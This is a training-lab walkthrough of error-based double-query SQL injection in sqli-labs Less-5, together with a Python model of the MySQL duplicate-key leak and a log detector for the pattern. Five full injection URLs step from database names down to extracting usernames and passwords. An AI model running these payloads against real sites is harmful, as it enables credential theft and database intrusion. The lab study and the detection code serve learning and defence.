Less-05 single-quote double-query (error-based) injection
Double-query injection relies on four functions/clauses:
Rand() random number function
Floor() rounding-down function
Count() aggregate function
Group by clause
Put simply: when count() is combined with a group by over a key built from rand(), MySQL raises a duplicate-key error, and the error message echoes part of the query's result, which is how data leaks.
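To show why this combination errors rather than simply grouping, here is an added Python model (not part of the original write-up) of how MySQL materialises GROUP BY into a temporary table: the grouping key is evaluated once to look up a row's group and, if the group does not exist yet, evaluated a second time for the insert. With a deterministic key both evaluations agree; with floor(rand()*2) they can differ, so the insert can collide with a group that already exists and the key, including whatever concat() put in front of it, appears in the error text. The key sequence, the label string and the function names are constructed assumptions for illustration.

```python
class DuplicateKeyError(Exception):
    """Stands in for MySQL error 1062: Duplicate entry '...' for key 'group_key'."""


def group_by_with_recomputed_key(rows, key_values, label):
    """Model of MySQL's GROUP BY temporary table (simplified, assumption).

    rows       : the source rows being aggregated (only their count matters here)
    key_values : constructed sequence standing in for successive floor(rand()*2) results
    label      : the concat() prefix that precedes the random digit in the group key
    """
    key_iter = iter(key_values)
    groups = {}
    for _ in rows:
        # First evaluation of the key: used to look the group up.
        lookup_key = f"{label}{next(key_iter)}"
        if lookup_key in groups:
            groups[lookup_key] += 1
            continue
        # Group not found: the key expression is evaluated AGAIN for the insert.
        insert_key = f"{label}{next(key_iter)}"
        if insert_key in groups:
            # The error message carries the full key, label included.
            raise DuplicateKeyError(f"Duplicate entry '{insert_key}' for key 'group_key'")
        groups[insert_key] = 1
    return groups


def run_query(row_count, key_values, label="leaked_value~"):
    """Return ('ok', groups) when grouping succeeds, or ('error', message) on collision."""
    try:
        return "ok", group_by_with_recomputed_key(range(row_count), key_values, label)
    except DuplicateKeyError as exc:
        return "error", str(exc)


if __name__ == "__main__":
    # Constructed sequence 0,1,1,0,1: row 1 looks up 0, inserts 1; row 2 finds 1;
    # row 3 looks up 0 (absent) and then tries to insert 1, which already exists.
    print(run_query(3, [0, 1, 1, 0, 1]))
    # A stable key never collides, so the same three rows group normally.
    print(run_query(3, [1, 1, 1, 1]))
```

The model also shows why the trick needs several source rows (information_schema.tables is chosen because it always has enough): with a single row there is no second lookup to collide with.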
Dumping the database name
http://192.168.0.155/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 4,1),"给我隔开",floor(rand()*2)) as a from information_schema.tables group by a)x) --+
Dumping the table name
http://192.168.0.155/Less-5/?id=1' and (select 1 from(select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 3,1),"给我隔开",floor(rand()*2)) as a from information_schema.tables group by a)x) --+
Dumping the columns
Here limit 1,1 happens to be the username column
http://192.168.0.155/Less-5/?id=1' and (select 1 from(select count(*),concat((select column_name from information_schema.columns where table_name='users' limit%201,1),"给我隔开",floor(rand(-1)*2)) as a from information_schema.tables group by a)x) --+
The username column is out; the next one should be the password column
http://192.168.0.155/Less-5/?id=1' and (select 1 from(select count(*),concat((select column_name from information_schema.columns where table_name='users' limit 2,1),"给我隔开",floor(rand(-1)*2)) as a from information_schema.tables group by a)x) --+
Perfect. Next, dump the usernames and their passwords directly
http://192.168.0.155/Less-5/?id=1' and (select 1 from(select count(*),concat((select concat('我是账号',username,char(32,58,32),'我是密码',password) from security.users limit 1,1),"给我隔开",floor(rand(-1)*2)) as a from information_schema.tables group by a)x) --+
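From the defender's side, every request above has the same recognisable shape in a web server access log: a count(*) over a group by whose key contains floor(rand(...)), usually with concat() and an information_schema read. The following added Python detector (not part of the original write-up) URL-decodes the query string of Apache-style log lines and flags that combination. The three log lines are constructed samples modelled on the URLs in this page; the indicator names and the scoring rule (all three core indicators must be present) are assumptions chosen to keep false positives low.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines: one benign request, two double-query requests.
SAMPLE_LOG = """\
192.168.0.10 - - [01/Jan/2024:10:00:00 +0000] "GET /Less-5/?id=1 HTTP/1.1" 200 512
192.168.0.10 - - [01/Jan/2024:10:00:05 +0000] "GET /Less-5/?id=1'%20and%20(select%201%20from%20(select%20count(*),concat((select%20schema_name%20from%20information_schema.schemata%20limit%204,1),floor(rand()*2))%20as%20a%20from%20information_schema.tables%20group%20by%20a)x)%20--+ HTTP/1.1" 200 1034
192.168.0.10 - - [01/Jan/2024:10:00:09 +0000] "GET /Less-5/?id=1%27%20and%20(select%201%20from(select%20count(*),concat((select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27%20limit%201,1),floor(rand(-1)*2))%20as%20a%20from%20information_schema.tables%20group%20by%20a)x)%20--+ HTTP/1.1" 200 1034
"""

# Indicators of the error-based double-query shape, matched on the decoded,
# lower-cased, whitespace-collapsed parameter value.
INDICATORS = {
    "count_star": re.compile(r"count\s*\(\s*\*\s*\)"),
    "group_by": re.compile(r"group\s+by"),
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\("),
    "concat": re.compile(r"\bconcat\s*\("),
    "info_schema": re.compile(r"information_schema\s*\."),
}
CORE = {"count_star", "group_by", "floor_rand"}
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def normalize(value: str) -> str:
    """Lower-case and collapse whitespace so spacing tricks do not dodge the patterns."""
    return re.sub(r"\s+", " ", value.lower()).strip()


def scan_line(line: str):
    """Return the sorted indicator names when a line matches, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    query = urlsplit(match.group(1)).query
    hits = set()
    # parse_qsl percent-decodes each value and turns '+' into a space.
    for _name, raw in parse_qsl(query, keep_blank_values=True):
        value = normalize(raw)
        for indicator, pattern in INDICATORS.items():
            if pattern.search(value):
                hits.add(indicator)
    return sorted(hits) if CORE <= hits else None


def scan_log(text: str):
    """Return [(line_number, indicators), ...] for every flagged line in the log text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            findings.append((lineno, hits))
    return findings


if __name__ == "__main__":
    for lineno, hits in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: double-query injection indicators {hits}")
```

Matching on the decoded parameter value rather than the raw request line matters here: the page's own payloads use %20 and %27 for spaces and quotes, so a naive substring search on the raw line would miss "group by". The real fix is still in the application, where the id parameter must reach MySQL as a bound parameter rather than being concatenated into the query string.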